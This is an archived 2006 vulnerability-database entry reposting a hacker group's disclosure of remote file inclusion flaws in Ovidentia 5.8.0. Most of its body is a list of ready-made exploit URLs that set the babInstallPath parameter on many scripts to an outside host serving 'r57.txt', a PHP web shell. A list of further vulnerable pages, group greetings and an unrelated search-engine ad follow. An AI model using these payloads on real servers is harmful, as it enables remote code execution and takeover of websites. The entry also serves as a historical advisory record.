Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12932
HistoryJun 02, 2006 - 12:00 a.m.

multiple file inclusion exploits in ovidentia v5.8.0

2006-06-0200:00:00
vulners.com
11

multiple file inclusion exploits in ovidentia v5.8.0

forum type : ovidentia v5.8.0
bug found by : black-code&sweet-devil
team : site-down
type : file include

####################################################
exploits :

http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/topman.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/approb.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/vacadmb.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/vacadma.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/vacadm.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/statart.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/search.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/posts.php?babInstallPath=http://Yoursite.com/r57.txt?

http://www.example.com/orid/ovidentia/options.php?babInstallPath=http://Yoursite.com/r57.txt?

And more pages are vulnerabe in the directory /ovidentia/ with the same
variable,

as an example :

login.php

frchart.php

flbchart.php

fileman.php

faq.php

event.php

directory.php

articles.php

artedit.php

approb.php

calday.php

And more … ;)

####################################################

#######################
emails:

[email protected] & [email protected]
#######################

All my respect to our friends , lezr.com , g123g.net

done … peace


Don't just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/